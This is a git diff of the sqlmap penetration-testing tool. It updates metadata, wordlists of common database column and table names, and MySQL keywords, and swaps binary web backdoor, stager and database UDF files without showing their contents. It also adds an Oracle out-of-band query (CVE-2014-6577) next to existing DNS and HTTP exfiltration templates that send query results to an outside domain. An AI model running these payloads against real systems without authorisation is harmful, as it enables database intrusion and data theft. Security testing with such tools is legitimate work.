diff --git a/.github/ISSUE_TEMPLATE/bug_report.md b/.github/ISSUE_TEMPLATE/bug_report.md
index b7753a2553d..0a2d0fe4aea 100644
--- a/.github/ISSUE_TEMPLATE/bug_report.md
+++ b/.github/ISSUE_TEMPLATE/bug_report.md
@@ -21,10 +21,10 @@ A clear and concise description of what you expected to happen.
If applicable, add screenshots to help explain your problem.
**Running environment:**
- - sqlmap version [e.g. 1.3.5.93#dev]
- - Installation method [e.g. git]
- - Operating system: [e.g. Microsoft Windows 10]
- - Python version [e.g. 3.5.2]
+ - sqlmap version [e.g. 1.7.2.12#dev]
+ - Installation method [e.g. pip]
+ - Operating system: [e.g. Microsoft Windows 11]
+ - Python version [e.g. 3.11.2]
**Target details:**
- DBMS [e.g. Microsoft SQL Server]
diff --git a/.github/workflows/tests.yml b/.github/workflows/tests.yml
index 674ae2a004e..40f0bdac166 100644
--- a/.github/workflows/tests.yml
+++ b/.github/workflows/tests.yml
@@ -10,7 +10,7 @@ jobs:
strategy:
matrix:
os: [ubuntu-latest, macos-latest, windows-latest]
- python-version: [ '2.x', '3.11', 'pypy-2.7', 'pypy-3.7' ]
+ python-version: [ '3.11', 'pypy-2.7', 'pypy-3.7' ]
steps:
- uses: actions/checkout@v2
- name: Set up Python
diff --git a/LICENSE b/LICENSE
index 172de6054cb..894e0ec623c 100644
--- a/LICENSE
+++ b/LICENSE
@@ -1,7 +1,7 @@
COPYING -- Describes the terms under which sqlmap is distributed. A copy
of the GNU General Public License (GPL) is appended to this file.
-sqlmap is (C) 2006-2023 Bernardo Damele Assumpcao Guimaraes, Miroslav Stampar.
+sqlmap is (C) 2006-2024 Bernardo Damele Assumpcao Guimaraes, Miroslav Stampar.
This program is free software; you may redistribute and/or modify it under
the terms of the GNU General Public License as published by the Free
diff --git a/README.md b/README.md
index 3ac67dbca9b..772c3d08738 100644
--- a/README.md
+++ b/README.md
@@ -58,8 +58,9 @@ Translations
* [Dutch](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-nl-NL.md)
* [French](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-fr-FR.md)
* [Georgian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ka-GE.md)
-* [German](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-de-GER.md)
+* [German](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-de-DE.md)
* [Greek](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-gr-GR.md)
+* [Hindi](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-in-HI.md)
* [Indonesian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-id-ID.md)
* [Italian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-it-IT.md)
* [Japanese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ja-JP.md)
@@ -67,8 +68,9 @@ Translations
* [Persian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-fa-IR.md)
* [Polish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-pl-PL.md)
* [Portuguese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-pt-BR.md)
-* [Russian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ru-RUS.md)
+* [Russian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ru-RU.md)
* [Serbian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-rs-RS.md)
+* [Slovak](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-sk-SK.md)
* [Spanish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-es-MX.md)
* [Turkish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-tr-TR.md)
* [Ukrainian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-uk-UA.md)
diff --git a/data/procs/oracle/dns_request.sql b/data/procs/oracle/dns_request.sql
index adb71cfb2fb..5dda762c08d 100644
--- a/data/procs/oracle/dns_request.sql
+++ b/data/procs/oracle/dns_request.sql
@@ -1,2 +1,3 @@
SELECT UTL_INADDR.GET_HOST_ADDRESS('%PREFIX%.'||(%QUERY%)||'.%SUFFIX%.%DOMAIN%') FROM DUAL
# or SELECT UTL_HTTP.REQUEST('http://%PREFIX%.'||(%QUERY%)||'.%SUFFIX%.%DOMAIN%') FROM DUAL
+# or (CVE-2014-6577) SELECT EXTRACTVALUE(xmltype(' %remote;]>'),'/l') FROM dual
diff --git a/data/shell/backdoors/backdoor.asp_ b/data/shell/backdoors/backdoor.asp_
index 5a81545e020..bc912038c7d 100644
Binary files a/data/shell/backdoors/backdoor.asp_ and b/data/shell/backdoors/backdoor.asp_ differ
diff --git a/data/shell/backdoors/backdoor.aspx_ b/data/shell/backdoors/backdoor.aspx_
index 8e83a0d2009..de889b1ed7a 100644
Binary files a/data/shell/backdoors/backdoor.aspx_ and b/data/shell/backdoors/backdoor.aspx_ differ
diff --git a/data/shell/backdoors/backdoor.jsp_ b/data/shell/backdoors/backdoor.jsp_
index 8d01202f00f..f798ea5778c 100644
Binary files a/data/shell/backdoors/backdoor.jsp_ and b/data/shell/backdoors/backdoor.jsp_ differ
diff --git a/data/shell/backdoors/backdoor.php_ b/data/shell/backdoors/backdoor.php_
index 5db8f130f9b..720bfe1fff4 100644
Binary files a/data/shell/backdoors/backdoor.php_ and b/data/shell/backdoors/backdoor.php_ differ
diff --git a/data/shell/stagers/stager.asp_ b/data/shell/stagers/stager.asp_
index 5c235ecb5f4..bd08896ad19 100644
Binary files a/data/shell/stagers/stager.asp_ and b/data/shell/stagers/stager.asp_ differ
diff --git a/data/shell/stagers/stager.aspx_ b/data/shell/stagers/stager.aspx_
index f20887a96d6..3694b2c1533 100644
Binary files a/data/shell/stagers/stager.aspx_ and b/data/shell/stagers/stager.aspx_ differ
diff --git a/data/shell/stagers/stager.jsp_ b/data/shell/stagers/stager.jsp_
index beec2ae56ae..f70ac6f9efd 100644
Binary files a/data/shell/stagers/stager.jsp_ and b/data/shell/stagers/stager.jsp_ differ
diff --git a/data/shell/stagers/stager.php_ b/data/shell/stagers/stager.php_
index eafe6277127..c5103161a7d 100644
Binary files a/data/shell/stagers/stager.php_ and b/data/shell/stagers/stager.php_ differ
diff --git a/data/txt/common-columns.txt b/data/txt/common-columns.txt
index b2e00b3456d..a4cd79e75e6 100644
--- a/data/txt/common-columns.txt
+++ b/data/txt/common-columns.txt
@@ -1,4 +1,4 @@
-# Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+# Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
# See the file 'LICENSE' for copying permission
id
@@ -1844,6 +1844,10 @@ banner_id
error
language_id
val
+parol
+familiya
+imya
+otchestvo
# site:jp
@@ -2731,6 +2735,34 @@ ssn
account
confidential
+# site:nl
+
+naam
+straat
+gemeente
+beschrijving
+id_gebruiker
+gebruiker_id
+gebruikersnaam
+wachtwoord
+telefoon
+voornaam
+achternaam
+geslacht
+huisnummer
+gemeente
+leeftijd
+
+# site:cn
+
+yonghuming
+mima
+xingming
+xingbie
+touxiang
+youxiang
+shouji
+
# Misc
u_pass
diff --git a/data/txt/common-files.txt b/data/txt/common-files.txt
index 8fbbe0ebd7b..52d3368a538 100644
--- a/data/txt/common-files.txt
+++ b/data/txt/common-files.txt
@@ -1,4 +1,4 @@
-# Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+# Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
# See the file 'LICENSE' for copying permission
# CTFs
diff --git a/data/txt/common-outputs.txt b/data/txt/common-outputs.txt
index 60bdf5edb26..15651da4e44 100644
--- a/data/txt/common-outputs.txt
+++ b/data/txt/common-outputs.txt
@@ -1,4 +1,4 @@
-# Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+# Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
# See the file 'LICENSE' for copying permission
[Banners]
@@ -399,6 +399,7 @@ XDBWEBSERVICES
# MySQL
information_schema
+performance_schema
mysql
phpmyadmin
diff --git a/data/txt/common-tables.txt b/data/txt/common-tables.txt
index 8776e2e8864..f1db0644ca5 100644
--- a/data/txt/common-tables.txt
+++ b/data/txt/common-tables.txt
@@ -1,4 +1,4 @@
-# Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+# Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
# See the file 'LICENSE' for copying permission
users
@@ -3578,3 +3578,11 @@ users
user_usergroup_map
viewlevels
weblinks
+
+# site:nl
+
+gebruikers
+
+# site:cn
+
+yonghu
diff --git a/data/txt/keywords.txt b/data/txt/keywords.txt
index f8c81387c07..50b4262615b 100644
--- a/data/txt/keywords.txt
+++ b/data/txt/keywords.txt
@@ -1,4 +1,4 @@
-# Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+# Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
# See the file 'LICENSE' for copying permission
# SQL-92 keywords (reference: http://developer.mimer.com/validator/sql-reserved-words.tml)
@@ -452,6 +452,762 @@ WRITEXOR
YEAR_MONTH
ZEROFILL
+# MySQL 8.0 keywords (reference: https://dev.mysql.com/doc/refman/8.0/en/keywords.html)
+
+ACCESSIBLE
+ACCOUNT
+ACTION
+ACTIVE
+ADD
+ADMIN
+AFTER
+AGAINST
+AGGREGATE
+ALGORITHM
+ALL
+ALTER
+ALWAYS
+ANALYSE
+ANALYZE
+AND
+ANY
+ARRAY
+AS
+ASC
+ASCII
+ASENSITIVE
+AT
+ATTRIBUTE
+AUTHENTICATION
+AUTOEXTEND_SIZE
+AUTO_INCREMENT
+AVG
+AVG_ROW_LENGTH
+BACKUP
+BEFORE
+BEGIN
+BETWEEN
+BIGINT
+BINARY
+BINLOG
+BIT
+BLOB
+BLOCK
+BOOL
+BOOLEAN
+BOTH
+BTREE
+BUCKETS
+BULK
+BY
+BYTE
+CACHE
+CALL
+CASCADE
+CASCADED
+CASE
+CATALOG_NAME
+CHAIN
+CHALLENGE_RESPONSE
+CHANGE
+CHANGED
+CHANNEL
+CHAR
+CHARACTER
+CHARSET
+CHECK
+CHECKSUM
+CIPHER
+CLASS_ORIGIN
+CLIENT
+CLONE
+CLOSE
+COALESCE
+CODE
+COLLATE
+COLLATION
+COLUMN
+COLUMNS
+COLUMN_FORMAT
+COLUMN_NAME
+COMMENT
+COMMIT
+COMMITTED
+COMPACT
+COMPLETION
+COMPONENT
+COMPRESSED
+COMPRESSION
+CONCURRENT
+CONDITION
+CONNECTION
+CONSISTENT
+CONSTRAINT
+CONSTRAINT_CATALOG
+CONSTRAINT_NAME
+CONSTRAINT_SCHEMA
+CONTAINS
+CONTEXT
+CONTINUE
+CONVERT
+CPU
+CREATE
+CROSS
+CUBE
+CUME_DIST
+CURRENT
+CURRENT_DATE
+CURRENT_TIME
+CURRENT_TIMESTAMP
+CURRENT_USER
+CURSOR
+CURSOR_NAME
+DATA
+DATABASE
+DATABASES
+DATAFILE
+DATE
+DATETIME
+DAY
+DAY_HOUR
+DAY_MICROSECOND
+DAY_MINUTE
+DAY_SECOND
+DEALLOCATE
+DEC
+DECIMAL
+DECLARE
+DEFAULT
+DEFAULT_AUTH
+DEFINER
+DEFINITION
+DELAYED
+DELAY_KEY_WRITE
+DELETE
+DENSE_RANK
+DESC
+DESCRIBE
+DESCRIPTION
+DES_KEY_FILE
+DETERMINISTIC
+DIAGNOSTICS
+DIRECTORY
+DISABLE
+DISCARD
+DISK
+DISTINCT
+DISTINCTROW
+DIV
+DO
+DOUBLE
+DROP
+DUAL
+DUMPFILE
+DUPLICATE
+DYNAMIC
+EACH
+ELSE
+ELSEIF
+EMPTY
+ENABLE
+ENCLOSED
+ENCRYPTION
+END
+ENDS
+ENFORCED
+ENGINE
+ENGINES
+ENGINE_ATTRIBUTE
+ENUM
+ERROR
+ERRORS
+ESCAPE
+ESCAPED
+EVENT
+EVENTS
+EVERY
+EXCEPT
+EXCHANGE
+EXCLUDE
+EXECUTE
+EXISTS
+EXIT
+EXPANSION
+EXPIRE
+EXPLAIN
+EXPORT
+EXTENDED
+EXTENT_SIZE
+FACTOR
+FAILED_LOGIN_ATTEMPTS
+FALSE
+FAST
+FAULTS
+FETCH
+FIELDS
+FILE
+FILE_BLOCK_SIZE
+FILTER
+FINISH
+FIRST
+FIRST_VALUE
+FIXED
+FLOAT
+FLOAT4
+FLOAT8
+FLUSH
+FOLLOWING
+FOLLOWS
+FOR
+FORCE
+FOREIGN
+FORMAT
+FOUND
+FROM
+FULL
+FULLTEXT
+FUNCTION
+GENERAL
+GENERATE
+GENERATED
+GEOMCOLLECTION
+GEOMETRY
+GEOMETRYCOLLECTION
+GET
+GET_FORMAT
+GET_MASTER_PUBLIC_KEY
+GET_SOURCE_PUBLIC_KEY
+GLOBAL
+GRANT
+GRANTS
+GROUP
+GROUPING
+GROUPS
+GROUP_REPLICATION
+GTID_ONLY
+HANDLER
+HASH
+HAVING
+HELP
+HIGH_PRIORITY
+HISTOGRAM
+HISTORY
+HOST
+HOSTS
+HOUR
+HOUR_MICROSECOND
+HOUR_MINUTE
+HOUR_SECOND
+IDENTIFIED
+IF
+IGNORE
+IGNORE_SERVER_IDS
+IMPORT
+IN
+INACTIVE
+INDEX
+INDEXES
+INFILE
+INITIAL
+INITIAL_SIZE
+INITIATE
+INNER
+INOUT
+INSENSITIVE
+INSERT
+INSERT_METHOD
+INSTALL
+INSTANCE
+INT
+INT1
+INT2
+INT3
+INT4
+INT8
+INTEGER
+INTERSECT
+INTERVAL
+INTO
+INVISIBLE
+INVOKER
+IO
+IO_AFTER_GTIDS
+IO_BEFORE_GTIDS
+IO_THREAD
+IPC
+IS
+ISOLATION
+ISSUER
+ITERATE
+JOIN
+JSON
+JSON_TABLE
+JSON_VALUE
+KEY
+KEYRING
+KEYS
+KEY_BLOCK_SIZE
+KILL
+LAG
+LANGUAGE
+LAST
+LAST_VALUE
+LATERAL
+LEAD
+LEADING
+LEAVE
+LEAVES
+LEFT
+LESS
+LEVEL
+LIKE
+LIMIT
+LINEAR
+LINES
+LINESTRING
+LIST
+LOAD
+LOCAL
+LOCALTIME
+LOCALTIMESTAMP
+LOCK
+LOCKED
+LOCKS
+LOGFILE
+LOGS
+LONG
+LONGBLOB
+LONGTEXT
+LOOP
+LOW_PRIORITY
+MASTER
+MASTER_AUTO_POSITION
+MASTER_BIND
+MASTER_COMPRESSION_ALGORITHMS
+MASTER_CONNECT_RETRY
+MASTER_DELAY
+MASTER_HEARTBEAT_PERIOD
+MASTER_HOST
+MASTER_LOG_FILE
+MASTER_LOG_POS
+MASTER_PASSWORD
+MASTER_PORT
+MASTER_PUBLIC_KEY_PATH
+MASTER_RETRY_COUNT
+MASTER_SERVER_ID
+MASTER_SSL
+MASTER_SSL_CA
+MASTER_SSL_CAPATH
+MASTER_SSL_CERT
+MASTER_SSL_CIPHER
+MASTER_SSL_CRL
+MASTER_SSL_CRLPATH
+MASTER_SSL_KEY
+MASTER_SSL_VERIFY_SERVER_CERT
+MASTER_TLS_CIPHERSUITES
+MASTER_TLS_VERSION
+MASTER_USER
+MASTER_ZSTD_COMPRESSION_LEVEL
+MATCH
+MAXVALUE
+MAX_CONNECTIONS_PER_HOUR
+MAX_QUERIES_PER_HOUR
+MAX_ROWS
+MAX_SIZE
+MAX_UPDATES_PER_HOUR
+MAX_USER_CONNECTIONS
+MEDIUM
+MEDIUMBLOB
+MEDIUMINT
+MEDIUMTEXT
+MEMBER
+MEMORY
+MERGE
+MESSAGE_TEXT
+MICROSECOND
+MIDDLEINT
+MIGRATE
+MINUTE
+MINUTE_MICROSECOND
+MINUTE_SECOND
+MIN_ROWS
+MOD
+MODE
+MODIFIES
+MODIFY
+MONTH
+MULTILINESTRING
+MULTIPOINT
+MULTIPOLYGON
+MUTEX
+MYSQL_ERRNO
+NAME
+NAMES
+NATIONAL
+NATURAL
+NCHAR
+NDB
+NDBCLUSTER
+NESTED
+NETWORK_NAMESPACE
+NEVER
+NEW
+NEXT
+NO
+NODEGROUP
+NONE
+NOT
+NOWAIT
+NO_WAIT
+NO_WRITE_TO_BINLOG
+NTH_VALUE
+NTILE
+NULL
+NULLS
+NUMBER
+NUMERIC
+NVARCHAR
+OF
+OFF
+OFFSET
+OJ
+OLD
+ON
+ONE
+ONLY
+OPEN
+OPTIMIZE
+OPTIMIZER_COSTS
+OPTION
+OPTIONAL
+OPTIONALLY
+OPTIONS
+OR
+ORDER
+ORDINALITY
+ORGANIZATION
+OTHERS
+OUT
+OUTER
+OUTFILE
+OVER
+OWNER
+PACK_KEYS
+PAGE
+PARSER
+PARTIAL
+PARTITION
+PARTITIONING
+PARTITIONS
+PASSWORD_LOCK_TIME
+PATH
+PERCENT_RANK
+PERSIST
+PERSIST_ONLY
+PHASE
+PLUGIN
+PLUGINS
+PLUGIN_DIR
+POINT
+POLYGON
+PORT
+PRECEDES
+PRECEDING
+PRECISION
+PREPARE
+PRESERVE
+PREV
+PRIMARY
+PRIVILEGES
+PRIVILEGE_CHECKS_USER
+PROCEDURE
+PROCESS
+PROCESSLIST
+PROFILE
+PROFILES
+PROXY
+PURGE
+QUARTER
+QUERY
+QUICK
+RANDOM
+RANGE
+RANK
+READ
+READS
+READ_ONLY
+READ_WRITE
+REAL
+REBUILD
+RECOVER
+RECURSIVE
+REDOFILE
+REDO_BUFFER_SIZE
+REDUNDANT
+REFERENCE
+REFERENCES
+REGEXP
+REGISTRATION
+RELAY
+RELAYLOG
+RELAY_LOG_FILE
+RELAY_LOG_POS
+RELAY_THREAD
+RELEASE
+RELOAD
+REMOTE
+REMOVE
+RENAME
+REORGANIZE
+REPAIR
+REPEAT
+REPEATABLE
+REPLACE
+REPLICA
+REPLICAS
+REPLICATE_DO_DB
+REPLICATE_DO_TABLE
+REPLICATE_IGNORE_DB
+REPLICATE_IGNORE_TABLE
+REPLICATE_REWRITE_DB
+REPLICATE_WILD_DO_TABLE
+REPLICATE_WILD_IGNORE_TABLE
+REPLICATION
+REQUIRE
+REQUIRE_ROW_FORMAT
+RESET
+RESIGNAL
+RESOURCE
+RESPECT
+RESTART
+RESTORE
+RESTRICT
+RESUME
+RETAIN
+RETURN
+RETURNED_SQLSTATE
+RETURNING
+RETURNS
+REUSE
+REVERSE
+REVOKE
+RIGHT
+RLIKE
+ROLE
+ROLLBACK
+ROLLUP
+ROTATE
+ROUTINE
+ROW
+ROWS
+ROW_COUNT
+ROW_FORMAT
+ROW_NUMBER
+RTREE
+SAVEPOINT
+SCHEDULE
+SCHEMA
+SCHEMAS
+SCHEMA_NAME
+SECOND
+SECONDARY
+SECONDARY_ENGINE
+SECONDARY_ENGINE_ATTRIBUTE
+SECONDARY_LOAD
+SECONDARY_UNLOAD
+SECOND_MICROSECOND
+SECURITY
+SELECT
+SENSITIVE
+SEPARATOR
+SERIAL
+SERIALIZABLE
+SERVER
+SESSION
+SET
+SHARE
+SHOW
+SHUTDOWN
+SIGNAL
+SIGNED
+SIMPLE
+SKIP
+SLAVE
+SLOW
+SMALLINT
+SNAPSHOT
+SOCKET
+SOME
+SONAME
+SOUNDS
+SOURCE
+SOURCE_AUTO_POSITION
+SOURCE_BIND
+SOURCE_COMPRESSION_ALGORITHMS
+SOURCE_CONNECT_RETRY
+SOURCE_DELAY
+SOURCE_HEARTBEAT_PERIOD
+SOURCE_HOST
+SOURCE_LOG_FILE
+SOURCE_LOG_POS
+SOURCE_PASSWORD
+SOURCE_PORT
+SOURCE_PUBLIC_KEY_PATH
+SOURCE_RETRY_COUNT
+SOURCE_SSL
+SOURCE_SSL_CA
+SOURCE_SSL_CAPATH
+SOURCE_SSL_CERT
+SOURCE_SSL_CIPHER
+SOURCE_SSL_CRL
+SOURCE_SSL_CRLPATH
+SOURCE_SSL_KEY
+SOURCE_SSL_VERIFY_SERVER_CERT
+SOURCE_TLS_CIPHERSUITES
+SOURCE_TLS_VERSION
+SOURCE_USER
+SOURCE_ZSTD_COMPRESSION_LEVEL
+SPATIAL
+SPECIFIC
+SQL
+SQLEXCEPTION
+SQLSTATE
+SQLWARNING
+SQL_AFTER_GTIDS
+SQL_AFTER_MTS_GAPS
+SQL_BEFORE_GTIDS
+SQL_BIG_RESULT
+SQL_BUFFER_RESULT
+SQL_CACHE
+SQL_CALC_FOUND_ROWS
+SQL_NO_CACHE
+SQL_SMALL_RESULT
+SQL_THREAD
+SQL_TSI_DAY
+SQL_TSI_HOUR
+SQL_TSI_MINUTE
+SQL_TSI_MONTH
+SQL_TSI_QUARTER
+SQL_TSI_SECOND
+SQL_TSI_WEEK
+SQL_TSI_YEAR
+SRID
+SSL
+STACKED
+START
+STARTING
+STARTS
+STATS_AUTO_RECALC
+STATS_PERSISTENT
+STATS_SAMPLE_PAGES
+STATUS
+STOP
+STORAGE
+STORED
+STRAIGHT_JOIN
+STREAM
+STRING
+SUBCLASS_ORIGIN
+SUBJECT
+SUBPARTITION
+SUBPARTITIONS
+SUPER
+SUSPEND
+SWAPS
+SWITCHES
+SYSTEM
+TABLE
+TABLES
+TABLESPACE
+TABLE_CHECKSUM
+TABLE_NAME
+TEMPORARY
+TEMPTABLE
+TERMINATED
+TEXT
+THAN
+THEN
+THREAD_PRIORITY
+TIES
+TIME
+TIMESTAMP
+TIMESTAMPADD
+TIMESTAMPDIFF
+TINYBLOB
+TINYINT
+TINYTEXT
+TLS
+TO
+TRAILING
+TRANSACTION
+TRIGGER
+TRIGGERS
+TRUE
+TRUNCATE
+TYPE
+TYPES
+UNBOUNDED
+UNCOMMITTED
+UNDEFINED
+UNDO
+UNDOFILE
+UNDO_BUFFER_SIZE
+UNICODE
+UNINSTALL
+UNION
+UNIQUE
+UNKNOWN
+UNLOCK
+UNREGISTER
+UNSIGNED
+UNTIL
+UPDATE
+UPGRADE
+URL
+USAGE
+USE
+USER
+USER_RESOURCES
+USE_FRM
+USING
+UTC_DATE
+UTC_TIME
+UTC_TIMESTAMP
+VALIDATION
+VALUE
+VALUES
+VARBINARY
+VARCHAR
+VARCHARACTER
+VARIABLES
+VARYING
+VCPU
+VIEW
+VIRTUAL
+VISIBLE
+WAIT
+WARNINGS
+WEEK
+WEIGHT_STRING
+WHEN
+WHERE
+WHILE
+WINDOW
+WITH
+WITHOUT
+WORK
+WRAPPER
+WRITE
+X509
+XA
+XID
+XML
+XOR
+YEAR
+YEAR_MONTH
+ZEROFILL
+ZONE
+
# PostgreSQL|SQL:2016|SQL:2011 reserved words (reference: https://www.postgresql.org/docs/current/sql-keywords-appendix.html)
ABS
@@ -872,3 +1628,8 @@ XMLTABLE
XMLTEXT
XMLVALIDATE
YEAR
+
+# Misc
+
+ORD
+MID
diff --git a/data/txt/user-agents.txt b/data/txt/user-agents.txt
index 02f52001940..a92582d3995 100644
--- a/data/txt/user-agents.txt
+++ b/data/txt/user-agents.txt
@@ -1,4 +1,4 @@
-# Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+# Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
# See the file 'LICENSE' for copying permission
# Opera
diff --git a/data/udf/mysql/linux/32/lib_mysqludf_sys.so_ b/data/udf/mysql/linux/32/lib_mysqludf_sys.so_
index f401c800406..bfd4440ba5f 100644
Binary files a/data/udf/mysql/linux/32/lib_mysqludf_sys.so_ and b/data/udf/mysql/linux/32/lib_mysqludf_sys.so_ differ
diff --git a/data/udf/mysql/linux/64/lib_mysqludf_sys.so_ b/data/udf/mysql/linux/64/lib_mysqludf_sys.so_
index f442d1f14de..1992ed0347e 100644
Binary files a/data/udf/mysql/linux/64/lib_mysqludf_sys.so_ and b/data/udf/mysql/linux/64/lib_mysqludf_sys.so_ differ
diff --git a/data/udf/mysql/windows/32/lib_mysqludf_sys.dll_ b/data/udf/mysql/windows/32/lib_mysqludf_sys.dll_
index 17814b6ba53..bb8ec366d4c 100644
Binary files a/data/udf/mysql/windows/32/lib_mysqludf_sys.dll_ and b/data/udf/mysql/windows/32/lib_mysqludf_sys.dll_ differ
diff --git a/data/udf/mysql/windows/64/lib_mysqludf_sys.dll_ b/data/udf/mysql/windows/64/lib_mysqludf_sys.dll_
index 33a7adbe0c5..97799b69d4d 100644
Binary files a/data/udf/mysql/windows/64/lib_mysqludf_sys.dll_ and b/data/udf/mysql/windows/64/lib_mysqludf_sys.dll_ differ
diff --git a/data/udf/postgresql/linux/32/10/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/32/10/lib_postgresqludf_sys.so_
index f7e6da36499..33dbdeeb35b 100644
Binary files a/data/udf/postgresql/linux/32/10/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/32/10/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/linux/32/11/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/32/11/lib_postgresqludf_sys.so_
index 3b030e70b1f..c56d766209a 100644
Binary files a/data/udf/postgresql/linux/32/11/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/32/11/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/linux/32/8.2/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/32/8.2/lib_postgresqludf_sys.so_
index 7c72515a892..3fb236e2644 100644
Binary files a/data/udf/postgresql/linux/32/8.2/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/32/8.2/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/linux/32/8.3/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/32/8.3/lib_postgresqludf_sys.so_
index 43f7cdc55d9..d734fff00ae 100644
Binary files a/data/udf/postgresql/linux/32/8.3/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/32/8.3/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/linux/32/8.4/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/32/8.4/lib_postgresqludf_sys.so_
index 2c49149d0d5..da50fa8eafc 100644
Binary files a/data/udf/postgresql/linux/32/8.4/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/32/8.4/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/linux/32/9.0/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/32/9.0/lib_postgresqludf_sys.so_
index f463ee7543d..83732d33298 100644
Binary files a/data/udf/postgresql/linux/32/9.0/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/32/9.0/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/linux/32/9.1/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/32/9.1/lib_postgresqludf_sys.so_
index 147039a2542..ee1ca8ccef1 100644
Binary files a/data/udf/postgresql/linux/32/9.1/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/32/9.1/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/linux/32/9.2/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/32/9.2/lib_postgresqludf_sys.so_
index cf56372ea9a..ab7e7456223 100644
Binary files a/data/udf/postgresql/linux/32/9.2/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/32/9.2/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/linux/32/9.3/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/32/9.3/lib_postgresqludf_sys.so_
index 8ec4566eb7b..5314a0a3886 100644
Binary files a/data/udf/postgresql/linux/32/9.3/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/32/9.3/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/linux/32/9.4/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/32/9.4/lib_postgresqludf_sys.so_
index 310f838de53..da9d0a7f6f7 100644
Binary files a/data/udf/postgresql/linux/32/9.4/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/32/9.4/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/linux/32/9.5/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/32/9.5/lib_postgresqludf_sys.so_
index 504be8277e3..1100ab820fd 100644
Binary files a/data/udf/postgresql/linux/32/9.5/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/32/9.5/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/linux/32/9.6/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/32/9.6/lib_postgresqludf_sys.so_
index 2e19b356e14..f9396a86aa5 100644
Binary files a/data/udf/postgresql/linux/32/9.6/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/32/9.6/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/linux/64/10/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/64/10/lib_postgresqludf_sys.so_
index ee94408ecd4..21bbddcf59e 100644
Binary files a/data/udf/postgresql/linux/64/10/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/64/10/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/linux/64/11/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/64/11/lib_postgresqludf_sys.so_
index 8a61270ca7a..9327b1cdba3 100644
Binary files a/data/udf/postgresql/linux/64/11/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/64/11/lib_postgresqludf_sys.so_ differ
diff --git a/data/udf/postgresql/linux/64/12/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/64/12/lib_postgresqludf_sys.so_
index b1258cbe9a4..a9874449464 100644
Binary files a/data/udf/postgresql/linux/64/12/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/64/12/lib_postgresqludf_sys.so_ differ
